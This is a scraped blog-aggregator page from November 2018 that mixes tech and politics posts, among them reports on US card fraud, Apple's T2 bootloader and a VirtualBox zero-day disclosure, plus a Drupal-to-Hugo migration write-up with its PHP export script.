  • I liked your post about the blogger who tells her story. I saw Matt Haughey post something the other day lamenting there weren't more bloggers. I responded that there aren't that many bloggers. We're different.
  • Then I thought, if this were an industry we would have a PR firm that made sure we were included in important discussions, about law, policy, society, culture.
  • It's one of the things that's wrong. We develop great stuff, then the pros come in, take it over, miss the point, and drive it in the wrong direction. Or forget the roots, or don't protect its openness.
  • It's so weird that I can't even get into the covnersation about podcasting, something that I personally developed.

Security chips have not reduced US credit-card fraud [Cory Doctorow – Boing Boing]

The US credit card industry was a very late adopter of security chips, lagging the EU by a decade or so; when they did roll out chips, it was a shambolic affair, with many payment terminals still not using the chips, and almost no terminals requiring a PIN (and some require a PIN and a signature, giving rise to the curiously American security protocol of chip-and-PIN-and-swipe-and-sign).

The adoption of security chips has not slowed credit card fraud, either. 60,000,000 US credit cards were compromised in the past 12 months and 90% of those were chip-enabled. The majority of compromised cards were stolen by infected point-of-sale terminals. The US has the worst credit card security in the world.

The findings come from a Gemini Advisory report, which blames a "lack of chip compliance" in merchants for the rise.

Based on the proprietary Gemini Advisory telemetry data collected from various dark-web sources over several years, we have determined that in the past 12 months at least 60 million US cards were compromised. Of those, 75% or 45.8 million were CP records, likely compromised through card-sniffing and point-of-sale (POS) breaches of businesses such as Saks, Lord & Taylor, Jason’s Deli, Cheddar’s Scratch Kitchen, Forever 21, and Whole Foods. To break it down even further, 90% or 41.6 million of those records were EMV chip-enabled.

Furthermore, the shift in Card-Not-Present (CNP) fraud is becoming more evident with a 14% increase in payment cards compromised through e-commerce breaches in the past 12 months. Payment card data that that was stolen from Orbitz, Ticketmaster, City of Goodyear, and British Airways represented only a small part of the 14.2 million CNP records posted for sale in the past 12 months.

Card Fraud on the Rise, Despite National EMV Adoption [Gemini Advisory]

Credit Card Chips Fail to Halt Fraud, Survey Says [Jeff John Roberts/Fortune]

(via /.)

14:14

Ritesh Raj Sarraf: Migrating from Drupal to Hugo [Planet Debian]

TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website’s history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of html pages. Being (and still) a novice in web, my website was mostly on ideas from others. IIRC, for the bare html one, I took a lot of look wise details from Miss Garrels’ website.

First blog

My initial blog was self-hosted with a blogging software in PHP, named PivotX The website for it still works, so hopefully the project is still alive. It was pretty good a tool for the purpose. Very lean and had support for data backends in both, MySQL and flat files. The latter was important to me as I wanted to keep it simple.

Drupal

My first interaction with Drupal was with its WSOD. That was it until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employer.

Back then, we tried multiple tools: Jive, Joomla, Wordpress and many more. But finally, resorted to Drupal. What the requirement was was to have something which would filter content under nested categories. Then, of the many things tried, the only one which seemed to be able to do it was Drupal with its Taxonomy feature, along with a couple of community driven add-on modules.

We built it but there were other challenges. It was hard to find people who were good with Drupal. I remember to have interviewed around 10-15 people, who could take over the web portal and maintain it, and still not able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then, had ambitious goals to also serve an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS Feeds. But the only data import path I could find back then was to import content through RSS Feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I always desired to build some skills Hands-On (that’s how the job market likes it; irrespective of the skills, it is the hands-on that they evaluate) by using Drupal both, at the employer’s community portal and my personal website.

Little did I know that running/maintaining a website is one aspect; where as extending it, is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And it is not about migrations to a different platform. Rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories from the past, of when using Red Hat Linux and SuSE Linux distribution; where upgrades were not a common term, and every major release of the distribution people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it, was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came in with Drupal 8. It took the pain to the next level repeating the same process of dropping modules and breaking functionalities; never did I hear much of backward compatibility on this platform.

Hugo

For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module, that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So the annoyance and my limitations with web technologies was still prone to with WP. This migration path did not enthuse me much: it was more like a Hindi idiom: आसमान से गिरे और खजूर में अटके

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module, which IIRC did not work proper. Similar was the case with Hugo, which has a module listed on its migration page, drupal2hugo, which sets a disappointment in the beginning itself.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul share migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of comments) but not much was I in a position to wait more.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on markdown generated with Hugo. More than the tool, I am happy to have the data available in a much standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php
define('DRUPAL_ROOT', __DIR__);
include_once(DRUPAL_ROOT . '/includes/bootstrap.inc');
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
$nids = db_query('SELECT DISTINCT(nid) FROM {node}')
  ->fetchCol();
$nodes = node_load_multiple($nids);
foreach($nodes as $node) {
  $front_matter = array(
    'title' => $node->title,
    'date' => date('c', $node->created),
    'lastmod' => date('c', $node->changed),
    'draft' => 'false',
  );
  if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) {
    $tags = taxonomy_term_load_multiple(
      array_column(
        $node->taxonomy_vocabulary_2[LANGUAGE_NONE],
        'tid'
      )
    );
    $front_matter['tags'] = array_column($tags, 'name');
  }
  if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) {
    $cat = taxonomy_term_load_multiple(
      array_column(
        $node->taxonomy_vocabulary_1[LANGUAGE_NONE],
        'tid'
      )
    );
    $front_matter['categories'] = array_column($cat, 'name');
  }
  $path = drupal_get_path_alias('node/'.$node->nid);
  if ($path != 'node/'.$node->nid) {
    $front_matter['url'] = '/'.$path;
    $content_dir = explode('/', $path);
    $content_dir = end($content_dir);
  }
  else {
    $content_dir = $node->nid;
  }
  $content = json_encode(
    $front_matter,
    JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE
  );
  $content .= "\n\n";
  $tmp_file = '/tmp/node.html';
  file_put_contents($tmp_file, $node->body['fr'][0]['value']);
  $body = shell_exec('html2markdown '.$tmp_file);
  unlink($tmp_file);
  //$body = $node->body['fr'][0]['value'];
  $content .= $body;
  $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir;
  mkdir($dir_name, 0777, true);
  file_put_contents($dir_name.'/index.md', $content);
}

Link [Scripting News]

A three-minute video demo of Like.

Link [Scripting News]

I changed the way the thumb works in Like. Now, when you click the thumb, it fills in, when you click it again it toggles to being open. It used to flip to down. This was confusing. Now it doesn't flip, it's always up. I think this feels better, burns fewer braincells.

Apple's new bootloader won't let you install GNU/Linux -- Updated [Cory Doctorow – Boing Boing]

Locking bootloaders with trusted computing is an important step towards protecting users from some of the most devastating malware attacks: by allowing the user to verify their computing environment, trusted computing can prevent compromises to operating systems and other low-level parts of their computer's operating environment.

But as with every security measure, there's a difference between "secure for the user" and "secure against the user." Bootloader protection that doesn't allow an owner to decide which signatures they trust is security against the user: security that prevents the user from overriding the manufacturer, and so allows the manufacturer to lock the user in.

Apple's latest bootloader protection, the controversial T2 chip, is a good example of this. The chip comes with a user-inaccessible root of trust that allows for the installation of Apple and Microsoft operating systems, but not GNU/Linux and other open and free alternatives.

There's no reason it has to be this way: Google's flagship Pixel Chromebooks come with hardware switches that can be activated during the bootup to allow their owners to change which signatures the system trusts (users can initialize these systems with passwords that prevent others from covertly altering the trusted root later). This gives users the best of both worlds: a system that, by default, protects them from malware, and, with should the user choose, allows them to nominate parties other than Google to decide whom they trust.

To make things worse, publishing tools to allow for bootloader overrides is legally risky under section 1201 of the DMCA, which provides for 5 year prison sentences and $500,000 fines (for a first offense) for anyone who trafficks in tools to override access controls for copyrighted works.

Update: After some doing, it's possible to install GNU/Linux by disabling boot security altogether, though some further tweaking is required. However, unlike with the Pixel, you can't manually install your own trusted signatures into the bootloading security process.

Apple's T2 documentation makes it clear and explicitly mentions Linux:

NOTE: There is currently no trust provided for the the Microsoft Corporation UEFI CA 2011, which would allow verification of code signed by Microsoft partners. This UEFI CA is commonly used to verify the authenticity of bootloaders for other operating systems such as Linux variants.

In other words, until Apple decides to add this certificate or the T2 chip otherwise is cracked so it could be fully disabled or allowed to load arbitrary keys, good luck even being able to boot Linux distributions on the new Apple hardware.

Apple's New Hardware With The T2 Security Chip Will Currently Block Linux From Booting [Michael Larabel/Phoronix]

(via /.)

Oracle's bad faith with security researchers led to publication of a Virtualbox 0-day [Cory Doctorow – Boing Boing]

In the debate over "responsible disclosure," advocates for corporate power say that companies have to be able to decide who can reveal defects in their products and under which circumstances, lest bad actors reveal their bugs without giving them time to create and promulgate a patch.

But over and over again, this theory of corporate responsibility and security researcher intransigence falls apart. The reality is that the kinds of security researchers who want to report bugs (rather than using them to attack people) are primarily interested in improving security, and corporations that offer good-faith promises (and live up to them) can easily tempt researchers into coordinating their disclosures. When corporations threaten researchers or fail to act on their warnings, the result isn't silence -- it's uncoordinated disclosure, when a security researcher simply publishes their findings without warning the company first.

The latest example of this is Sergey Zelenyuk's publication of a "100% reliable" exploit against Virtualbox, Oracle's popular virtual machine software. The exploit allows attackers to puncture the virtual machine's sandbox and access the underlying system's files and processes.

Zelenyuk published the zero-day bug because of Oracle's long history of mistreatment of security researchers (including threatening customers with legal retaliation if they hire auditors to examine the software Oracle sold them), and its cavalier handling of bugs, including a 15-month lag between learning of a similar bug and issuing a patch.

It's a sobering reminder that the "responsible disclosure" debate isn't about under which circumstances researchers can go public; it's about whether they choose to trust a company before going public. Some people have tried to shift the debate by criminalizing disclosure without corporate approval, but in those circumstances, we see even less coordination: it's becoming increasingly common for security researchers who fear retaliation to anonymously post their findings to pastebin and similar sites.

The vulnerability has security researchers panicking because VirtualBox is one of the most popular VM applications used for day-to-day malware analysis and reverse engineering.

Many have expressed concerns that malware authors may embed the zero-day's exploit chain inside malware strains that will then be able to escape VirtualBox VMs and infect the researcher's main operating systems with malware, as payback.

Today's zero-day disclosure is also the second virtual machine escape that Zelenyuk has discovered affecting VirtualBox. He found and reported a similar issue in mid-2017, which Oracle took over 15 months to fix.

VirtualBox zero-day published by disgruntled researcher [Catalin Cimpanu/Zdnet]

(via /.)

Reminder: ousted California Republican Dana Rohrabacher is a filthy tenant from hell [Cory Doctorow – Boing Boing]

Dana Rohrabacher was an oddity: a Republican lawmaker sent from Democratic stronghold to the California legislature he's now out of a job).

Rohrabacher was a genuinely terrible lawmaker: in ten years, the Tea Party darling voted to hand the president all-pervasive, permanent, unchecked spying powers; claimed the neo-Nazi march in Charlottesville was a Democratic Party conspiracy; was tricked into screaming racist slurs by Sacha Baron Cohen; called the cops on a constituent who asked him persistent questions; etc.

But one thing you may not remember is that Rohrabacher, a man who claims to venerate private property rights above all others, rented a house in Orange County, changed the locks to deny the owner entry, then trashed the place, filling it with garbage, destroying the fixtures, furniture and appliances; cutting the phone lines; and leaving behind squirming maggots under the stove. The damage cost $28,500 to fix.

Then Rohrabacher sued his landlord for not refunding his security deposit.

In August, a year after he, his wife and their triplets left the disaster and stiffed Polyniak out of a week of due rent, the congressman hired a lawyer, Devon R. Lucas, to file a lawsuit in Orange County Superior Court. According to the complaint, Rohrabacher, who skipped all military service when he was eligible to fight in Vietnam and nowadays hails himself “a patriot,” thinks he and his wife are the victims in the dispute. He wants Polyniak—a soft-spoken construction subcontractor who honorably served in the U.S. Marines—to pay him $20,000 for not refunding his security deposit in a timely manner.

With a scheduled April 2014 court-management conference, the case doesn’t look close to a respectable resolution. Lucas has sent Polyniak more than 50 hostile letters, a tactic apparently designed to win a default by handing the ex-landlord ever-increasing legal bills. What expenses Rohrabacher is incurring, if any, in the battle are unknown. Lucas, who lists his law-office address as a Costa Mesa mail drop, did not respond to inquiries about whether he is providing the congressman free or discounted services.

In September, Polyniak filed a cross-complaint in court. That lawsuit alleges in part that the Rohrabachers “failed to perform their obligations under the lease and have breached the terms and conditions of the lease in numerous, material ways.” Among the breaches: The congressman—who’d quietly bought a $1 million home in another part of Costa Mesa—refused to provide a forwarding address for an extended period of time.

Dana Rohrabacher Is Dirty [R. Scott Moxley/OC Weekly]

Rohrabacher Comes Clean About Messy Housing Dispute [Warren Rojas/Rollcall]

(Thanks, Fipi Lele!)

11:28

Simply awake [Seth's Blog]

Not groggy, not zoned out, not hyper, merely awake.

Aware of what’s around us. Present. Seeing things clearly, hearing them as if for the first time.

How often are we lucky enough to be awake?

Mass media, social networks, marketers—they rarely help us become awake. They seek clicking, buying, fearful zombies instead.

The people we seek to serve, those that we’re trying to reach–in the rare moments when they’re awake, are we wasting that tiny slice of magic? Do we create fear or boredom or ennui in the short run merely because it’s easier for us?

Seeking a state of awake seems like a worthy quest. And when we find it, it’s worth cherishing.

10:21

An algorithm a day will keep the doctor at bay | David Mitchell [David Mitchell | The Guardian]

Government plans to exploit personal data to target individuals is a shabby way to spend NHS money

“In the UK, we are spending £97bn of public money on treating disease and only £8bn preventing it,” the health secretary Matt Hancock said last week. “You don’t have to be an economist to see those numbers don’t stack up.” But Matt Hancock actually is an economist, so how does he know? I suppose he might have canvassed the views of some non-economists, but I’m sceptical about how rigorous that survey can have been.

“Hi Chris, Linda…” (good to get a gender balance) “… have you got a second?” Hancock may have asked his aides. “Of course, minister.” “You did classics and history respectively, right?” “That’s right.” (Chris is doing all the talking – come on, Linda!) “Great, so we’re spending £97bn on treating disease and only £8bn preventing it. Can you see that those numbers don’t stack up?” “Oh yes, absolutely,” says Chris. “Yes indeed, minister,” adds Linda.

A computer can instruct people on how not to get ill ... the fact that there’ll hardly be any hospitals will be an added incentive!

Related: People must take responsibility for own health, says Matt Hancock

Continue reading...

08:49

Corel Wrongly Accuses Licensed User of Piracy, Disables Software Remotely [TorrentFreak]

While the majority of computing devices come with sophisticated operating systems installed, users will almost certainly need to buy additional software to meet their needs.

Open Source software can usually be obtained for free but millions of users opt for paid products that need to be licensed by the companies offering them.

Of course, piracy is a significant problem for the developers behind the majority of premium products. Most are available from torrent sites or file-hosting platforms, often arriving with a ‘crack’ that allows users to enjoy without paying.

Companies often have sophisticated systems to detect unlicensed products, sometimes with the reasonable aim of attempting to convert pirates into paying consumers. Earlier this year we reported on Corel’s efforts in this space after the company obtained a patent for a system which is able to offer an amnesty to illegal users via a popup.

“The amnesty offer may, for example, agree not to bring criminal charges in exchange for the user purchasing a legitimate copy of the product,” Corel’s patent reads.

“In this manner, the user of the pirated version is given the opportunity to purchase a legitimate copy which, if acted on, increases revenue for the manufacturer.”

While this is fair enough, what happens when it all goes wrong? Earlier this week, TorrentFreak was contacted by an angry Corel customer who was witnessing first hand what can happen when a piracy detection system blows a fuse.

“I am a valid and licensed user and Corel support has records of my license key and right to use this software on my work PC,” he told us.

Despite paying the company as required, he received the following popup instead.

Scary message from Corel

The message couldn’t be more clear. Corel states that the copy in use is illegal and as a result, its functionality has been severely limited. “All save, export and print features will be permanently disabled,” it warns.

According to Corel, all of these problems can be solved with a click of the blue “BUY A LEGAL COPY NOW” button, something that made our contact extremely angry.

“I get this extortion popup and threat to my means to make a living. I feel like Corel has hijacked my computer, my artwork and images and is preventing me from making a living just to sell another upgrade. This is wrong, and something needs to be done about his practice,” he told us.

It’s not surprising that the user was upset at Corel remotely disabling his software. Aside from having a valid license, his work ground to a halt. Initial emails back and forth had him messing around in his computer’s registry in an effort to fix the problem but all the time he was unable to carry on with his job.

“I have owned a licensed copy of Corel PrintShop Pro since 9/2016 and use it multiple times each day for work. I use it for editing and creating graphics and logos for customers that host events and in the medical field for patient wristbands at hospitals and clinics,” he told TF.

“These images are used to identify and even categorize different types of patients and attendees at events. At this time, I’m unable to meet the needs of my customers because I can’t save any new artwork for them. This has now gone on for more than 24 hours.”

Eventually, after lengthy email exchanges, the problem got fixed, albeit after Corel’s customer had been unable to use his software for an extended period. He says that the problem has left a bad taste in his mouth and wonders how many other people are getting the message and, crucially, whether less technical users are paying to have the anti-piracy message removed.

“I’m not sure how [the steps Corel took] corrected my license issue or if it just took me off the ‘hit list’ of victims of what I still feel was some kind of scam. Still no apology from Corel for the problems caused or the delays it forced on me,” he added.

TorrentFreak contacted Corel requesting information and received a response from Gerard Metrailler, EVP of Global Products, whose name is on the patent issued earlier this year.

“Our anti-piracy measures are designed specifically to protect our IP. And as part of this process, we offer an amnesty program on many of our products that gives users an easy way to purchase a legitimate version of our software at an affordable price,” Metrailler explained.

“Unfortunately, some users who believe they are running legitimate versions of our software are surprised to receive a notification that their license is invalid. In many of these cases, the products were purchased from online marketplaces, often at very low prices, and the users were not aware they were buying illegitimate software.

“It’s critical to note that customers should always purchase our software from authorized resellers or Corel directly,” he added.

Given comments on Corel’s forums about unlicensed resellers, early in the week TF checked with the user where he’d obtained his license. According to an original purchase receipt reviewed by TF, it was obtained from the company’s own online store and everything was in order.

Corel did, however, suggest that a customer could receive the anti-piracy warning in error and said any customers who believe they are affected should contact the company right away.

“[I]n the very rare event of a mis-identification, I can assure you that we will work quickly to get the issue corrected. We agree that even one customer affected by a mistake like this is one customer too many,” Metrailler said.

We asked Corel how many customers take them up on their offer of reduced price software as part of an amnesty but the company provided no details. We asked if there were any safeguards to prevent licensed users paying up in error but received no response.

Corel did, however, give TF a contact email address so that their customer can get directly in touch, and we’ve forwarded that to him. In the meantime, directly with the customer and independently of our discussions with him and the company, Corel support offered him a 5% discount on future purchases.

“I want to ask them if that 5% is good for Photoshop,” the customer commented dryly.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

08:00

In a World of Their Own [George Monbiot]

By downplaying and misrepresenting our environmental crisis, David Attenborough and the BBC have generated complacency, confusion and ignorance.

By George Monbiot, published in the Guardian, 7th Novemeber 2018

 

Knowingly creating a false impression of the world: this is a serious matter. It is more serious still when the BBC does it, and yet worse when the presenter is “the most trusted man in Britain”. But, as his latest interview with the Observer reveals, Sir David Attenborough sticks to his line that fully representing environmental issues is a “turn-off”.

His new series, Dynasties, will mention the pressures affecting wildlife, but Attenborough makes it clear that it will play them down. To do otherwise, he suggests, would be “proselytising” and “alarmist”. His series will be “a great relief from the political landscape which otherwise dominates our thoughts.” In light of the astonishing rate of collapse of the animal populations he features, alongside most of the rest of the world’s living systems, and when broadcasting as a whole has disgracefully failed to represent such truths, I don’t think such escapism is appropriate or justifiable.

It is not proselytising or alarmist to tell us the raw truth about what is happening to the world, however much it might discomfit us. Nor do I believe that revealing the marvels of nature automatically translates into environmental action, as the executive producer of Dynasties claims. I’ve come to believe it can have the opposite effect.

For many years, wildlife film-making has presented a pristine living world. It has created an impression of security and abundance, even in places afflicted by cascading ecological collapse. The cameras reassure us that there are vast tracts of wilderness in which wildlife continues to thrive. They cultivate complacency, not action.

You cannot do such a thing passively. Wildlife filmmakers I know tell me that the effort to portray what looks like an untouched ecosystem becomes harder every year. They have to choose their camera angles ever more carefully to exclude the evidence of destruction, travel further to find the Edens they depict. They know, and many feel deeply uncomfortable about it, that they are telling a false story, creating a fairytale world which persuades us that all is well, in the midst of an existential crisis. While many people, thanks in large part to David Attenborough, are now quite well informed about wildlife, we remain astonishingly ignorant about what is happening to it.

What makes Attenborough’s comments particularly odd is that they come just a year after the final episode of his Blue Planet II series triggered a massive effort to reduce plastic pollution. Though the programme made a complete dog’s breakfast of the issue, the response demonstrated a vast public appetite for information about the environmental crisis, and an urgent desire to act on it.

Since 1985, when I started work in the department that has made most of his programmes, I’ve pressed the BBC to reveal environmental realities, often with dismal results. In 1995, I spent several months with a producer, developing a novel and imaginative proposal for an environmental series. The producer returned from his meeting with the channel controller in a state of shock. “He just looked at the title and asked ‘Is this environment?’. I said yes. He said, ‘I’ve spent two years trying to get environment off this fucking channel. Why the fuck are you bringing me environment?’”. I later discovered that this response was typical. The controllers weren’t indifferent. They were actively hostile. If you ask me whether the BBC or ExxonMobil has done more to frustrate environmental action in this country, I would say the BBC.

We all knew that only one person had the power to break this dam. For decades, David Attenborough, a former channel controller widely seen as the living embodiment of the BBC, has been able to make any programme he wants. So where, we kept asking, was he? At last, in 2000, he presented an environmental series: The State of the Planet.

It was an interesting and watchable series, but it left us with nowhere to go and nothing to do. Only in the last few seconds of the final episode was there a hint that structural forces might be at play: “real success can only come if there’s a change in our societies, in our economics and in our politics.” But what change? What economics? What politics? He had given us no clues.

To make matters worse, it was sandwiched between further programmes of his about the wonders of nature, that created a strong impression of robust planetary health. He might have been describing two different worlds. Six years later, he made another environmental series, The Truth about Climate Change. And this, in my view, was a total disaster.

It told us nothing about the driving forces behind climate breakdown. The only mention of fossil fuel companies was as part of the solution: “the people who extract fossil fuels like oil and gas have now come up with a way to put carbon dioxide back under ground.” Apart from the general “we”, the only distinct force identified as responsible was the “1.3 billion Chinese”. That a large proportion of Chinese emissions are caused by manufacturing the goods we buy was not mentioned. The series immediately triggered a new form of climate denial: I was bombarded with people telling me there was no point in taking action in Britain, because the Chinese were killing the planet.

If Attenborough’s environmentalism has a coherent theme, it is shifting the blame away from powerful forces and onto either society in general or the poor and weak. Sometimes it becomes pretty dark. In 2013, he told the Telegraph “What are all these famines in Ethiopia? What are they about? They’re about too many people for too little land … We say, get the United Nations to send them bags of flour. That’s barmy.”

There had not been a famine in Ethiopia for 28 years, and the last one was caused not by an absolute food shortage, but by civil war and government policies. His suggestion that food relief is counter-productive suggests he has read nothing on the subject since Thomas Malthus’s essay in 1798. But, cruel and ignorant as these comments were, they were more or less cost-free. By contrast, you do not remain a national treasure by upsetting powerful vested interests: look at the flak the wildlife and environmental presenter Chris Packham attracts.

I have always been entranced by David Attenborough’s wildlife programmes, but astonished by his consistent failure to mount a coherent, truthful and effective defence of the living world he loves. His revelation of the wonders of nature has been a great public service. But withholding the knowledge we need to defend it is, I believe, a grave disservice.

www.monbiot.com

 

 

06:35

Link [Scripting News]

I want to learn more about the history of journalism.

05:07

Very Narbonic Kickstarter Sketches [Skin Horse]

Shaenon: A few more sketches for the Narbonic Kickstarter campaign.  These are all Narbonic-related, so sorry for the lack of Skin Horse characters.

Channing: On the other hand, Narbonic characters are super awesome, so there seems to me to be little need to apologize.

04:56

The Jenndra Identitty Comics [Mimi and Eunice]

I published these immediately after writing this:

Several months ago I drew some Mimi & Eunice cartoons about modern transactivism. As you might guess, these will be very offensive to some people. I have and have long had trans friends, but modern transactivism is no more representative of them, than Zionism is of Jews, the BJP is of Hindus, or the KKK is of Christians. Unfortunately, most liberal “allies” don’t know the difference between actual diverse trans people, and the misogynist activists that claim to speak for them. Most liberals don’t tolerate any critique these days, let alone cartoon critique, which is graphic and funny; nothing pisses off ideologues like humor, the ultimate “disrespect”.

These cartoons are the first and ONLY things I’ve ever created that I’ve been too scared to share. I feel really bad about my own fear here. My Muse is my “higher power” and being to afraid to publish this work is a sin. But I am that scared.

Really I’m scared for my poor little film Seder-Masochism. I didn’t want to be killed on my North American festival tour. A transactivist tried to get me shut down from Ottawa, and another called for a boycott of Animation Is Film in Los Angeles, and who knows what else they’re doing that I’m not even aware of. I was no-platformed in my own town for saying people with penises are male. 

I occasionally see someone discover Seder-Masochism on Twitter, and they are immediately chastised by transctivists who tell them I’m a “bigot” who “hates trans people.” In the current climate, that effectively stops the sharing of my work. I’m a Free Culture advocate and my work depends on sharing; politically-motivated shutdowns of sharing render Free Culture (or any culture) ineffective.

Since all this is happening anyway, should I just publish those cartoons? I suppose it will be even worse for me and Seder-Masochism if I do, but this is no way to live. I’m censoring myself out of fear.

________

And in a subsequent discussion on fecebook, I wrote:

See, I don’t want to offend trans PEOPLE, who I like, but I don’t mind offending transACTIVISTS, the misogynist kind, who I hate. Many of whom are not trans.

Guess the chips are gonna fall where they may.

Anyway, here they are, all in one place and in order. The titles link to the individual entries.

Meet Jenndra Identitty

Lesbian


reference

Groveling

1.

2.

Inclusive

Suicide Threat

Check Your Privilege

Not Even Yours

Circular Definition

Meet Lefty Doodbro

Oppression Olympics

1984

Women In Tech

Trans vs. Cis

Silencing

Spelling

Appropriating

Hate Speech

Everyone’s a Misogynist

Humanity

Meanwhile…

flattr this!

Saturday, 10 November

21:56

Dirk Eddelbuettel: RcppArmadillo 0.9.200.4.0 [Planet Debian]

armadillo image

A new RcppArmadillo release, now at 0.9.200.4.0, based on the new Armadillo release 9.200.4 from earlier this week, is now on CRAN, and should get to Debian very soon.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to a Matlab. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 532 (or 31 more since just the last release!) other packages on CRAN.

This release once again brings a number of improvements, see below for details.

Changes in RcppArmadillo version 0.9.200.4.0 (2018-11-09)

  • Upgraded to Armadillo release 9.200.4 (Carpe Noctem)

    • faster handling of symmetric positive definite matrices by rcond()

    • faster transpose of matrices with size ≥ 512x512

    • faster handling of compound sparse matrix expressions by accu(), diagmat(), trace()

    • faster handling of sparse matrices by join_rows()

    • expanded sign() to handle scalar arguments

    • expanded operators (*, %, +, ) to handle sparse matrices with differing element types (eg. multiplication of complex matrix by real matrix)

    • expanded conv_to() to allow conversion between sparse matrices with differing element types

    • expanded solve() to optionally allow keeping solutions of systems singular to working precision

    • workaround for gcc and clang bug in C++17 mode

  • Commented-out sparse matrix test consistently failing on the fedora-clang machine CRAN, and only there. No fix without access.

  • The 'Unit test' vignette is no longer included.

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

21:07

Holger Levsen: 20181110-lts-201810 [Planet Debian]

My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today while writing this I also noticed that https://lists.debian.org/debian-lts-announce/2018/10/threads.html currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess instead we need to focus on #859123 and #859122, so that DLAs are accessable to everyone in future.

20:14

Some weekend stable kernel updates [LWN.net]

The 4.18.18, 4.14.80, 4.9.136, 4.4.163, and 3.18.125 stable kernel updates have all been released; each contains a relatively large set of important fixes.

The 3.18.x updates may be about to come to an end, since it is not clear that anybody is using them. "And from what I can see in the 'real world', no one is actually updating devices that rely on 3.18.y to the newer kernel releases. So I think I'm going to stop maintaining this tree soon unless someone speaks up and says 'I am using it!''

17:42

Link [Scripting News]

Super important point: The 2018 election isn't over. At stake, governorships of Florida and Georgia. Senator from Florida. Stacey Abrams is leading the fight. She is so strong and determined. If she wins, we will win, hugely. Give her money now.

16:56

Link [Scripting News]

I started a thread for the Like functionality.

Link [Scripting News]

Had a great talk this morning with Chuck Shotton. We've been doing projects together on and off for decades. A few thoughts. I spend most of my programming time refactoring code for different purposes. I learned the benefits of modularity almost at the beginning. UCSD Pascal had the concept of units, which were more clean and simple and powerful at the same time than the equivalent in JavaScript today, almost forty years later. Also we had a Lambda-like code environment in Frontier in the mid-90s. Cleaner and quite a bit more efficient imho. I have been modularizing my Node code, but haven't come close to the level of factoring we did with Frontier. No conclusions, just interesting to observe how glitchy progress is.

Link [Scripting News]

Probably the most damaging form of voter suppression is the kind going on now. Getting hysterical about completing the count when you've got the result you want. We should all be funding Stacey Abrams, who made voting rights her big issue and is fighting for it, now.

16:07

Link [Scripting News]

Feeling adventurous? Click the Like icon to the right.

Link [Scripting News]

Note -- you may have to Hard Reload the page to be sure the files it needs to implement like are reloaded.

15:42

1146: Assistance Needed [Order of the Stick]

http://www.GiantITP.com/comics/oots1146.html

15:21

Good morning [Scripting News]

I'm working on a feature for Scripting News today, so you may see some extraneous posts here over the next few hours.

Please excuse the dust. Dig we must!

11:49

Researchers Report Elsevier to EU Anti-Competition Authority [TorrentFreak]

Academia certainly isn’t our prime focus here at TorrentFreak, but we have mentioned Elsevier repeatedly throughout the years.

With a net income of roughly $3 billion and operating profits exceeding $1 billion, Elsevier is one of the largest academic publishers in the world. One that protects its business with vigor.

The company has sued ‘pirate’ sites “Sci-Hub and “LibGen” for the unauthorized distribution of millions of scientific papers, for example.

This resulted in a million dollar verdict in favor of the publisher, which was also able to seize several domain names. While Sci-Hub and LibGen are still around, Elsevier recently stepped up its game by obtaining an ISP blocking order against the sites in question.

So far, these efforts run parallel to what we see in the media piracy world. Torrent sites such as The Pirate Bay have been sued as well, and are now blocked in countries all over the world.

There is a significant difference though. The major movie studios who sue pirates sites have a good reputation in the industry, while Elsevier is heavily criticized by universities and researchers.

This criticism is far from new, but where the battle was previously fought in op-eds and on social media, it’s now on the agenda of the European Union as well. Pressure is mounting.

The first complaint comes from researchers Dr. Jonathan Tennant and Prof. Dr. Björn Brembs, who referred Elsevier’s parent company RELX Group to the EU Anti-Competition Authority late last month.

A serious allegation, but it turned out to be just the start.

